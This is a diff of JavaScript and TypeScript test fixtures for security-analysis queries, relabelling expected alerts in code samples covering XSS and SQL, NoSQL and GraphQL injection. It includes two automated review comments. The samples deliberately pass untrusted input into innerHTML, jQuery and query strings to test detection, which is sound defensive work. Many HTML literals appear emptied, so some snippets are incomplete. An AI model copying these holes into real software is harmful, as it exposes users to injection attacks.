@@ -4,5 +4,5 @@ const parseTorrent = require('parse-torrent'), express().get('/user/:id', function(req, res) { let torrent = parseTorrent(unknown), name = torrent.name; - res.send(name); // NOT OK + res.send(name); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/jquery-plugin.js b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/jquery-plugin.js index 6a133a747bdd..fb229199e687 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/jquery-plugin.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/jquery-plugin.js @@ -5,11 +5,11 @@ factory(jQuery); } }(function ($) { - $("" + $.trim("foo") + ""); // OK + $("" + $.trim("foo") + ""); })); $.fn.myPlugin = function (stuff, options) { - $("#foo").html("" + options.foo + ""); // NOT OK + $("#foo").html("" + options.foo + ""); // $ Alert - $("#foo").html("" + stuff + ""); // NOT OK + $("#foo").html("" + stuff + ""); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib/src/MyNode.ts b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib/src/MyNode.ts index 91e81238605a..9c48ed8c23f5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib/src/MyNode.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib/src/MyNode.ts @@ -1,4 +1,4 @@ export function trivialXss(s: string) { - const html = "" + s + ""; // NOT OK + const html = "" + s + ""; // $ Alert document.querySelector("#html").innerHTML = html; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/index.ts b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/index.ts index 4e5e4730547e..3ec0e2007396 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/index.ts 
+++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/index.ts @@ -1,10 +1,10 @@ export function trivialXss(s: string) { - const html = "" + s + ""; // NOT OK - this file is recognized as a main file. + const html = "" + s + ""; // $ Alert - this file is recognized as a main file. document.querySelector("#html").innerHTML = html; } export function objectStuff(settings: any, i: number) { - document.querySelector("#html").innerHTML = "" + settings + ""; // NOT OK + document.querySelector("#html").innerHTML = "" + settings + ""; // $ Alert var name; if (settings.mySetting && settings.mySetting.length !== 0) { @@ -15,7 +15,7 @@ export function objectStuff(settings: any, i: number) { name = ""; } - document.querySelector("#html").innerHTML = "" + name + ""; // NOT OK + document.querySelector("#html").innerHTML = "" + name + ""; // $ Alert } } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/src/MyNode.ts b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/src/MyNode.ts index e28325ce0cf8..9566ce8468a8 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/src/MyNode.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/src/MyNode.ts @@ -1,4 +1,4 @@ export function trivialXss(s: string) { - const html = "" + s + ""; // NOT OK - this file is not recognized as a main file. + const html = "" + s + ""; // $ Alert - this file is not recognized as a main file. document.querySelector("#html").innerHTML = html; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js index 01d376a2f8be..369643121368 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js 
@@ -1,15 +1,15 @@ module.exports.xssThroughHTMLConstruction = function (s) { - const html = "" + s + "";// NOT OK + const html = "" + s + "";// $ Alert document.querySelector("#html").innerHTML = html; } module.exports.xssThroughXMLParsing = function (s) { - const doc = new DOMParser().parseFromString(s, "text/xml"); // NOT OK + const doc = new DOMParser().parseFromString(s, "text/xml"); // $ Alert document.querySelector("#xml").appendChild(doc.documentElement); } module.exports.xssThroughMoreComplexXMLParsing = function (s) { - const doc = new DOMParser().parseFromString(s, "text/xml"); // NOT OK + const doc = new DOMParser().parseFromString(s, "text/xml"); // $ Alert const xml = doc.documentElement; const tmp = document.createElement('span'); @@ -19,13 +19,13 @@ module.exports.xssThroughMoreComplexXMLParsing = function (s) { const markdown = require('markdown-it')({html: true}); module.exports.xssThroughMarkdown = function (s) { - const html = markdown.render(s); // NOT OK + const html = markdown.render(s); // $ Alert document.querySelector("#markdown").innerHTML = html; } const striptags = require('striptags'); module.exports.sanitizedHTML = function (s) { - const html = striptags("" + s + ""); // OK + const html = striptags("" + s + ""); document.querySelector("#sanitized").innerHTML = html; } @@ -44,7 +44,7 @@ class Foo { doXss() { // not called here, but still bad. - document.querySelector("#class").innerHTML = "" + this.step + ""; // NOT OK + document.querySelector("#class").innerHTML = "" + this.step + ""; // $ Alert } } 
@@ -59,35 +59,35 @@ $.fn.xssPlugin = function (options) { }; const settings = $.extend(defaults, options); return this.each(function () { - $("" + settings.name + "").appendTo(this); // NOT OK + $("" + settings.name + "").appendTo(this); // $ Alert }); } module.exports.guards = function (attrVal) { - document.querySelector("#id").innerHTML = "\"""; // NOT OK - document.querySelector("#id").innerHTML = "\"""; // OK + document.querySelector("#id").innerHTML = "\"""; // $ Alert + document.querySelector("#id").innerHTML = "\"""; if (attrVal.indexOf("\"") === -1 && attrVal.indexOf("'") === -1) { - document.querySelector("#id").innerHTML = "\"""; // OK + document.querySelector("#id").innerHTML = "\"""; } } module.exports.intentionalTemplate = function (obj) { - const html = "" + obj.spanTemplate + ""; // OK + const html = "" + obj.spanTemplate + ""; document.querySelector("#template").innerHTML = html; } module.exports.types = function (val) { if (typeof val === "string") { - $("#foo").html("" + val + ""); // NOT OK + $("#foo").html("" + val + ""); // $ Alert } else if (typeof val === "number") { - $("#foo").html("" + val + ""); // OK + $("#foo").html("" + val + ""); } else if (typeof val === "boolean") { - $("#foo").html("" + val + ""); // OK + $("#foo").html("" + val + ""); } } function createHTML(x) { - return "" + x + ""; // NOT OK + return "" + x + ""; // $ Alert } module.exports.usesCreateHTML = function (x) { 
@@ -96,24 +96,24 @@ module.exports.usesCreateHTML = function (x) { const myMermaid = require('mermaid'); module.exports.usesCreateHTML = function (x) { - myMermaid.render("id", x, function (svg) { // NOT OK + myMermaid.render("id", x, function (svg) { // $ Alert $("#foo").html(svg); }); - $("#foo").html(myMermaid.render("id", x)); // NOT OK + $("#foo").html(myMermaid.render("id", x)); // $ Alert - mermaid.render("id", x, function (svg) {// NOT OK + mermaid.render("id", x, function (svg) {// $ Alert $("#foo").html(svg); }); - $("#foo").html(mermaid.render("id", x)); // NOT OK + $("#foo").html(mermaid.render("id", x)); // $ Alert - mermaid.mermaidAPI.render("id", x, function (svg) {// NOT OK + mermaid.mermaidAPI.render("id", x, function (svg) {// $ Alert $("#foo").html(svg); }); } module.exports.xssThroughMarkdown = function (s) { - const html = markdown.render(s); // NOT OK + const html = markdown.render(s); // $ Alert document.querySelector("#markdown").innerHTML = html; } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/typed.ts b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/typed.ts index 0f04e92cdc04..a00719d74408 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/typed.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/typed.ts @@ -1,11 +1,11 @@ export function basicHtmlConstruction(s: string) { - const html = "" + s + ""; // NOT OK + const html = "" + s + ""; // $ Alert document.body.innerHTML = html; } export function insertIntoCreatedDocument(s: string) { const newDoc = document.implementation.createHTMLDocument(""); - newDoc.body.innerHTML = "" + s + ""; // OK - inserted into document disconnected from the main DOM. [INCONSISTENCY] + newDoc.body.innerHTML = "" + s + ""; // $ SPURIOUS: Alert - inserted into document disconnected from the main DOM. } export function id(s: string) { 
@@ -14,7 +14,7 @@ export function id(s: string) { export function notVulnerable() { const s = id("x"); - const html = "" + s + ""; // OK + const html = "" + s + ""; document.body.innerHTML = html; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/unsafe-jquery-plugin.js b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/unsafe-jquery-plugin.js index bda981fe2b7d..896c4f8af210 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/unsafe-jquery-plugin.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/unsafe-jquery-plugin.js @@ -1,63 +1,63 @@ (function(){ $.fn.my_plugin = function my_plugin(options) { - $(options); // NOT OK (or is it?) + $(options); // $ Alert - or is it? - $(options.target); // NOT OK + $(options.target); // $ Alert if (isElement(options.target)) { - $(options.target); // OK + $(options.target); } var target = options.target; if (isElement(target)) { - $(target); // OK + $(target); } if (typeof target != "string") { - $(target); // OK + $(target); } if (target.jquery === undefined) { - $(target); // NOT OK + $(target); // $ Alert } else { - $(target); // OK + $(target); } if (target.jquery !== undefined) { - $(target); // OK + $(target); } else { - $(target); // NOT OK + $(target); // $ Alert } if (typeof target.jquery !== "undefined") { - $(target); // OK + $(target); } else { - $(target); // NOT OK + $(target); // $ Alert } if (typeof target.jquery === "undefined") { - $(target); // NOT OK + $(target); // $ Alert } else { - $(target); // OK + $(target); } if (target.jquery) { - $(target); // OK + $(target); } else { - $(target); // NOT OK + $(target); // $ Alert } if (!target.jquery) { - $(target); // NOT OK + $(target); // $ Alert } else { - $(target); // OK + $(target); } if (!!target.jquery) { - $(target); // OK + $(target); } else { - $(target); // NOT OK + $(target); // $ Alert } }; 
@@ -65,20 +65,20 @@ $.fn.my_plugin = function my_plugin(element, options) { this.$element = $(element); this.options = $.extend({}, options); - if (this.options.parent) this.$parent = $(this.options.parent) // NOT OK + if (this.options.parent) this.$parent = $(this.options.parent) // $ Alert }; $.fn.my_plugin = function my_plugin(options) { - $(options.foo.bar.baz); // NOT OK - $(options.html); // OK + $(options.foo.bar.baz); // $ Alert + $(options.html); }; $.fn.my_plugin = function my_plugin(options) { - $(x).appendTo(options.foo.bar.baz); // NOT OK + $(x).appendTo(options.foo.bar.baz); // $ Alert }; $.fn.my_plugin = function my_plugin(options) { - $("#" + options.target); // OK + $("#" + options.target); }; $.fn.my_plugin = function my_plugin(options) { @@ -87,7 +87,7 @@ var t = this.o.target; console.log(t); - $(t); // NOT OK + $(t); // $ Alert } f(options); }; @@ -95,7 +95,7 @@ $.fn.my_plugin = function my_plugin(options) { var target = options.target; if (safe.has(target)) - $(target); // OK + $(target); }; $.fn.my_plugin = function my_plugin(options) { @@ -103,8 +103,8 @@ menu: '
    ', target: '.my_plugin' }, options); - $(options.menu); // OK - $(options.target); // NOT OK + $(options.menu); + $(options.target); // $ Alert }; $.fn.my_plugin.defaults = { @@ -113,38 +113,38 @@ }; $.fn.my_plugin = function my_plugin(options) { options = $.extend({}, $.fn.my_plugin.defaults, options); - $(options.menu); // OK - $(options.target); // NOT OK + $(options.menu); + $(options.target); // $ Alert }; var pluginName = "my_plugin"; $.fn[pluginName] = function my_plugin(options) { - $(options.target); // NOT OK + $(options.target); // $ Alert }; $.extend($.fn, { my_plugin: function my_plugin(options) { - $(options.target); // NOT OK + $(options.target); // $ Alert } }); $.fn.affix = function my_plugin(options) { - $(options.target); // NOT OK + $(options.target); // $ Alert }; $.fn.tooltip = function my_plugin(options) { - $(options.viewport.selector); // NOT OK + $(options.viewport.selector); // $ Alert }; $.fn.my_plugin = function my_plugin(options) { let intentional1 = options.target || `
    hello
    `; - $(intentional1); // OK + $(intentional1); let intentional2 = `
    ${options.target}
    `; - $(intentional2); // OK + $(intentional2); let intentional3 = `
    ` + options.target `
    `; - $(intentional3); // OK + $(intentional3); let unintentional = `
    `; $(unintentional); // OK - but should be flagged by another query @@ -152,22 +152,22 @@ $.fn.my_plugin = function my_plugin(options) { let target = options.target; - target === DEFAULTS.target? $(target): $(document).find(target); // OK - options.target === DEFAULTS.target? $(options.target): $(document).find(options.target); // OK - options.targets.a === DEFAULTS.target? $(options.target.a): $(document).find(options.target.a); // OK - should be sanitized by `MembershipTestSanitizer` - but still flagged because `AccessPath` can't handle these deeply nested properties [INCONSISTENCY] + target === DEFAULTS.target? $(target): $(document).find(target); + options.target === DEFAULTS.target? $(options.target): $(document).find(options.target); + options.targets.a === DEFAULTS.target? $(options.target.a): $(document).find(options.target.a); // $ SPURIOUS: Alert - should be sanitized by `MembershipTestSanitizer` - but still flagged because `AccessPath` can't handle these deeply nested properties } $.fn.my_plugin = function my_plugin(options) { - $(anyPrefix + options.target); // OK (unlikely to be a html/css prefix confusion) + $(anyPrefix + options.target); // OK - unlikely to be a html/css prefix confusion - $(something.replace("%PLACEHOLDER%", options.target)); // OK (unlikely to be a html/css prefix confusion); + $(something.replace("%PLACEHOLDER%", options.target)); // OK - (unlikely to be a html/css prefix confusion); let target = options.target; if (target.foo) { - $(target); // OK (unlikely to be a string) + $(target); // OK - unlikely to be a string } if (target.length) { - $(target); // NOT OK (can still be a string) + $(target); // $ Alert - can still be a string } } 
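Review bot: The `// $ SPURIOUS: Alert` on the `options.targets.a === DEFAULTS.target` line may be mislabelled, because the guard reads `options.targets.a` (plural) while the sinks read `options.target.a`, so the comparison never constrains the value passed to `$()`. If the plural is a typo, change the guard to `options.target.a === DEFAULTS.target` before attributing the alert to an `AccessPath` limitation; if it is intentional, the alert looks like a true positive and should be plain `// $ Alert`. In the same hunk, `// OK - (unlikely to be a html/css prefix confusion);` keeps the old parentheses and trailing semicolon; `// OK - unlikely to be a html/css prefix confusion` would match the line above it. The enclosing plugin functions start and end outside the hunk.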
@@ -176,10 +176,10 @@ $.fn.my_plugin = o.f } setupPlugin({f: function(options) { - $(options.target); // NOT OK + $(options.target); // $ Alert }}); setupPlugin({f:function(options) { - $(document).find(options.target); // OK + $(document).find(options.target); }}); $.fn.position = function( options ) { @@ -189,14 +189,14 @@ // extending options options = $.extend( {}, options ); - var target = $( options.of ); // NOT OK + var target = $( options.of ); // $ Alert console.log(target); }; $.fn.blockReceiver = function( options ) { $.extend({ foo() { - $(this); // OK + $(this); } }, options, diff --git a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/angular.ts b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/angular.ts index 15207cb5059c..e9ca1f400890 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/angular.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/angular.ts @@ -13,24 +13,24 @@ export class Foo { safeField: string = ""; setInput1(event) { - document.write(event.target.value); // NOT OK + document.write(event.target.value); // $ Alert } setInput2(target) { - document.write(target.value); // NOT OK + document.write(target.value); // $ Alert } setOtherInput(e) { - document.write(e.target.value); // OK - document.write(e.value); // OK + document.write(e.target.value); + document.write(e.value); } blah(form: NgForm) { - document.write(form.value.foo); // NOT OK + document.write(form.value.foo); // $ Alert } useField() { - document.write(this.field); // NOT OK - document.write(this.safeField); // OK + document.write(this.field); // $ Alert + document.write(this.safeField); } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/forms.js b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/forms.js index b91b7490bb2d..c78fc9284a15 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/forms.js 
+++ b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/forms.js @@ -6,10 +6,10 @@ const FormikBasic = () => ( { - $("#id").html(values.foo); // NOT OK + $("#id").html(values.foo); // $ Alert }} onSubmit={(values, { setSubmitting }) => { - $("#id").html(values.bar); // NOT OK + $("#id").html(values.bar); // $ Alert }} > {(inputs) => ( @@ -22,19 +22,19 @@ const FormikBasic = () => ( const FormikEnhanced = withFormik({ mapPropsToValues: () => ({ name: '' }), validate: values => { - $("#id").html(values.email); // NOT OK + $("#id").html(values.email); // $ Alert }, handleSubmit: (values, { setSubmitting }) => { - $("#id").html(values.email); // NOT OK + $("#id").html(values.email); // $ Alert } })(MyForm); (function () { const { values, submitForm } = useFormikContext(); - $("#id").html(values.email); // NOT OK + $("#id").html(values.email); // $ Alert - $("#id").html(submitForm.email); // OK + $("#id").html(submitForm.email); }) import { Form } from 'react-final-form' @@ -42,7 +42,7 @@ import { Form } from 'react-final-form' const App = () => (
    { - $("#id").html(values.stooge); // NOT OK + $("#id").html(values.stooge); // $ Alert }} initialValues={{ stooge: 'larry', employed: false }} render={({ handleSubmit, form, submitting, pristine, values }) => ( @@ -54,7 +54,7 @@ const App = () => ( ); function plainSubmit(e) { - $("#id").html(e.target.value); // NOT OK + $("#id").html(e.target.value); // $ Alert } const plainReact = () => ( @@ -69,7 +69,7 @@ import { useForm } from 'react-hook-form'; function HookForm() { const { register, handleSubmit, errors } = useForm(); // initialize the hook const onSubmit = (data) => { - $("#id").html(data.name); // NOT OK + $("#id").html(data.name); // $ Alert }; return ( @@ -90,7 +90,7 @@ function HookForm2() { type="button" onClick={() => { const values = getValues(); // { test: "test-input", test1: "test1-input" } - $("#id").html(values.name); // NOT OK + $("#id").html(values.name); // $ Alert }} > @@ -100,10 +100,10 @@ function HookForm2() { function vanillaJS() { document.querySelector("form.myform").addEventListener("submit", e => { - $("#id").html(e.target.value); // NOT OK + $("#id").html(e.target.value); // $ Alert }); document.querySelector("form.myform").onsubmit = function (e) { - $("#id").html(e.target.value); // NOT OK + $("#id").html(e.target.value); // $ Alert } } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/xss-through-dom.js b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/xss-through-dom.js index 354194a597d9..69812f74e847 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/xss-through-dom.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/xss-through-dom.js 
@@ -1,35 +1,35 @@ (function () { - $("#id").html($("textarea").val()); // NOT OK. + $("#id").html($("textarea").val()); // $ Alert - $("#id").html($(".some-element").text()); // NOT OK. + $("#id").html($(".some-element").text()); // $ Alert - $("#id").html($(".some-element").attr("foo", "bar")); // OK. - $("#id").html($(".some-element").attr({"foo": "bar"})); // OK. - $("#id").html($(".some-element").attr("data-target")); // NOT OK. + $("#id").html($(".some-element").attr("foo", "bar")); + $("#id").html($(".some-element").attr({"foo": "bar"})); + $("#id").html($(".some-element").attr("data-target")); // $ Alert $("#id").html( - document.getElementById("foo").innerText // NOT OK. + document.getElementById("foo").innerText // $ Alert ); $("#id").html( - document.getElementById("foo").innerHTML // OK - only repeats existing XSS. + document.getElementById("foo").innerHTML // OK - only repeats existing XSS. ); $("#id").html( - document.getElementById("foo").textContent // NOT OK. + document.getElementById("foo").textContent // $ Alert ); $("#id").html( - document.querySelectorAll("textarea")[0].value // NOT OK. + document.querySelectorAll("textarea")[0].value // $ Alert ); $("#id").html( - document.getElementById('div1').getAttribute('data-target') // NOT OK + document.getElementById('div1').getAttribute('data-target') // $ Alert ); function safe1(x) { // overloaded function. if (x.jquery) { - var foo = $(x); // OK + var foo = $(x); } } @@ -37,7 +37,7 @@ function safe2(x) { // overloaded function. if (typeof x === "object") { - var foo = $(x); // OK + var foo = $(x); } } safe2($("textarea").val()); 
@@ -48,52 +48,52 @@ ); - $("#id").get(0).innerHTML = $("textarea").val(); // NOT OK. + $("#id").get(0).innerHTML = $("textarea").val(); // $ Alert var base = $("#id"); - base[html ? 'html' : 'text']($("textarea").val()); // NOT OK. + base[html ? 'html' : 'text']($("textarea").val()); // $ Alert - $("#id").get(0).innerHTML = $("input").get(0).name; // NOT OK. - $("#id").get(0).innerHTML = $("input").get(0).getAttribute("name"); // NOT OK. + $("#id").get(0).innerHTML = $("input").get(0).name; // $ Alert + $("#id").get(0).innerHTML = $("input").get(0).getAttribute("name"); // $ Alert - $("#id").get(0).innerHTML = $("input").getAttribute("id"); // OK. + $("#id").get(0).innerHTML = $("input").getAttribute("id"); - $("#id").get(0).innerHTML = $(document).find("option").attr("value"); // NOT OK. + $("#id").get(0).innerHTML = $(document).find("option").attr("value"); // $ Alert var valMethod = $("textarea").val; - $("#id").get(0).innerHTML = valMethod(); // NOT OK + $("#id").get(0).innerHTML = valMethod(); // $ Alert var myValue = $(document).find("option").attr("value"); if(myValue.property) { - $("#id").get(0).innerHTML = myValue; // OK. + $("#id").get(0).innerHTML = myValue; } - $.jGrowl($("input").get(0).name); // NOT OK. 
+ $.jGrowl($("input").get(0).name); // $ Alert let selector = $("input").get(0).name; if (something()) { selector = $("textarea").val || '' } - $(selector); // NOT OK + $(selector); // $ Alert - $(document.my_form.my_input.value); // NOT OK + $(document.my_form.my_input.value); // $ Alert - $("#id").html( $('#foo').prop('innerText') ); // NOT OK + $("#id").html( $('#foo').prop('innerText') ); // $ Alert const anser = require("anser"); const text = $("text").text(); - $("#id").html(anser.ansiToHtml(text)); // NOT OK - $("#id").html(new anser().process(text)); // NOT OK + $("#id").html(anser.ansiToHtml(text)); // $ Alert + $("#id").html(new anser().process(text)); // $ Alert $("section h1").each(function(){ - $("nav ul").append("Section"); // OK + $("nav ul").append("Section"); }); - $("#id").html($("#foo").find(".bla")[0].value); // NOT OK. + $("#id").html($("#foo").find(".bla")[0].value); // $ Alert for (var i = 0; i < foo.length; i++) { - $("#id").html($("#foo").find(".bla")[i].value); // NOT OK. + $("#id").html($("#foo").find(".bla")[i].value); // $ Alert } })(); @@ -106,20 +106,20 @@ class Super { class Sub extends Super { constructor() { super(); - $("#id").get(0).innerHTML = "foo"; // NOT OK. Attack: `` + $("#id").get(0).innerHTML = "foo"; // $ Alert - Attack: `` } } (function () { const src = document.getElementById("#link").src; - $("#id").html(src); // NOT OK. + $("#id").html(src); // $ Alert - $("#id").attr("src", src); // OK + $("#id").attr("src", src); $("input.foo")[0].onchange = function (ev) { - $("#id").html(ev.target.files[0].name); // NOT OK. + $("#id").html(ev.target.files[0].name); // $ Alert - $("img#id").attr("src", URL.createObjectURL(ev.target.files[0])); // NOT OK + $("img#id").attr("src", URL.createObjectURL(ev.target.files[0])); // $ Alert } })(); 
@@ -128,31 +128,31 @@ class Sub extends Super { const wSelection = getSelection(); const dSelection = document.getSelection(); let linkText = wSelection.toString() || dSelection.toString() || ''; - elem.innerHTML = linkText; // NOT OK - $("#id").html(linkText); // NOT OK - elem.innerText = linkText; // OK + elem.innerHTML = linkText; // $ Alert + $("#id").html(linkText); // $ Alert + elem.innerText = linkText; })(); const cashDom = require("cash-dom"); (function () { const src = document.getElementById("#link").src; - cash("#id").html(src); // NOT OK. - cashDom("#id").html(src); // NOT OK + cash("#id").html(src); // $ Alert + cashDom("#id").html(src); // $ Alert var DOMPurify = { sanitize: function (src) { return src; // to model spuriously finding an edge. The below is still OK. } }; - cashDom("#id").html(DOMPurify ? DOMPurify.sanitize(src) : src); // OK + cashDom("#id").html(DOMPurify ? DOMPurify.sanitize(src) : src); - $("", { html: src }).appendTo("#id"); // NOT OK + $("", { html: src }).appendTo("#id"); // $ Alert function foo() { window.VeryUniqueXssTestName = { send: function (msg) { - $("#id").html(msg); // NOT OK + $("#id").html(msg); // $ Alert }, }; diff --git a/javascript/ql/test/query-tests/Security/CWE-089/local-threat-source/test.js b/javascript/ql/test/query-tests/Security/CWE-089/local-threat-source/test.js index 42b11b27b6eb..c80586686af9 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/local-threat-source/test.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/local-threat-source/test.js @@ -4,6 +4,6 @@ const pool = mysql.createPool(getConfig()); let temp = process.env['foo']; pool.getConnection(function(err, connection) { connection.query({ - sql: 'SELECT * FROM `books` WHERE `author` = ' + temp, // NOT OK + sql: 'SELECT * FROM `books` WHERE `author` = ' + temp, // $ Alert }, function(error, results, fields) {}); }); 
diff --git a/javascript/ql/test/query-tests/Security/CWE-089/typed/typedClient.ts b/javascript/ql/test/query-tests/Security/CWE-089/typed/typedClient.ts index 5741f61fad64..3db62486e260 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/typed/typedClient.ts +++ b/javascript/ql/test/query-tests/Security/CWE-089/typed/typedClient.ts @@ -11,7 +11,7 @@ app.use(bodyParser.json()); app.post("/find", (req, res) => { let v = JSON.parse(req.body.x); - getCollection().find({ id: v }); // NOT OK + getCollection().find({ id: v }); // $ Alert }); import * as mongoose from "mongoose"; @@ -19,6 +19,6 @@ declare function getMongooseModel(): mongoose.Model; declare function getMongooseQuery(): mongoose.Query; app.post("/find", (req, res) => { let v = JSON.parse(req.body.x); - getMongooseModel().find({ id: v }); // NOT OK - getMongooseQuery().find({ id: v }); // NOT OK + getMongooseModel().find({ id: v }); // $ Alert + getMongooseQuery().find({ id: v }); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/graphql.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/graphql.js index 723348daf574..df6be3893b2d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/graphql.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/graphql.js @@ -6,8 +6,7 @@ const kit = new Octokit(); app.get('/post/:id', function(req, res) { const id = req.params.id; - // NOT OK - const response = kit.graphql(` + const response = kit.graphql(` // $ Alert query { repository(owner: "github", name: "${id}") { object(expression: "master:foo") { 
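Review bot: In the `@@ -6,8 +6,7 @@` hunk of graphql.js the marker in ``const response = kit.graphql(` // $ Alert`` sits after the opening backtick, so it is template-literal text rather than a comment. It becomes part of the GraphQL string under test and, if the expectation framework only reads real comments, it is never seen as an expectation. The same applies to ``query: `{ // $ Alert`` in the later `@@ -80,8 +79,7 @@` hunk of this file. The marker needs to be on a line where `//` actually starts a comment, so check which line the alert is reported on and place it there, outside the literal. The template literal and the handler continue past the end of the hunk.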
@@ -24,13 +23,13 @@ import { graphql, withCustomRequest } from "@octokit/graphql"; app.get('/user/:id/', function(req, res) { const id = req.params.id; - const response = graphql(`foo ${id}`); // NOT OK + const response = graphql(`foo ${id}`); // $ Alert const myGraphql = withCustomRequest(request); - const response = myGraphql(`foo ${id}`); // NOT OK + const response = myGraphql(`foo ${id}`); // $ Alert const withDefaults = graphql.defaults({}); - withDefaults(`foo ${id}`); // NOT OK + withDefaults(`foo ${id}`); // $ Alert }); const { request } = require("@octokit/request"); @@ -41,11 +40,11 @@ app.get('/article/:id/', async function(req, res) { headers: { authorization: "token 0000000000000000000000000000000000000001", }, - query: `foo ${id}`, // NOT OK + query: `foo ${id}`, // $ Alert }); const withDefaults = request.defaults({}); - withDefaults("POST /graphql", { query: `foo ${id}` }); // NOT OK + withDefaults("POST /graphql", { query: `foo ${id}` }); // $ Alert }); import { Octokit as Core } from "@octokit/rest"; @@ -53,9 +52,9 @@ const kit2 = new Core(); app.get('/event/:id/', async function(req, res) { const id = req.params.id; - const result = await kit2.graphql(`foo ${id}`); // NOT OK + const result = await kit2.graphql(`foo ${id}`); // $ Alert - const result2 = await kit2.request("POST /graphql", { query: `foo ${id}` }); // NOT OK + const result2 = await kit2.request("POST /graphql", { query: `foo ${id}` }); // $ Alert }); import { graphql as nativeGraphql, buildSchema } from 'graphql'; @@ -72,7 +71,7 @@ var root = { app.get('/thing/:id', async function(req, res) { const id = req.query.id; - const result = await nativeGraphql(schema, "{ foo" + id + " }", root); // NOT OK + const result = await nativeGraphql(schema, "{ foo" + id + " }", root); // $ Alert fetch("https://my-grpahql-server.com/graphql", { method: "POST", 
@@ -80,8 +79,7 @@ app.get('/thing/:id', async function(req, res) { "Content-Type": "application/json" }, body: JSON.stringify({ - // NOT OK - query: `{ + query: `{ // $ Alert thing { name url @@ -97,7 +95,7 @@ app.get('/thing/:id', async function(req, res) { "Content-Type": "application/json" }, body: JSON.stringify({ - // OK + query: `{ thing { name @@ -117,5 +115,5 @@ app.get('/event/:id/', async function(req, res) { const kit = github.getOctokit("foo") const id = req.params.id; - const result = await kit.graphql(`foo ${id}`); // NOT OK + const result = await kit.graphql(`foo ${id}`); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/html-sanitizer.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/html-sanitizer.js index 50f0293c37fa..ade09ab6104e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/html-sanitizer.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/html-sanitizer.js @@ -13,6 +13,6 @@ const connection = mysql.createConnection({ app.use(route.get('/test1', (context, param1) => { param1 = xss(param1) connection.query( - `SELECT * FROM \`table\` WHERE \`name\` =` + param1, // NOT OK + `SELECT * FROM \`table\` WHERE \`name\` =` + param1, // $ Alert ); })); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/json-schema-validator.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/json-schema-validator.js index a3bfcfd4a30d..121044ae5a14 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/json-schema-validator.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/json-schema-validator.js 
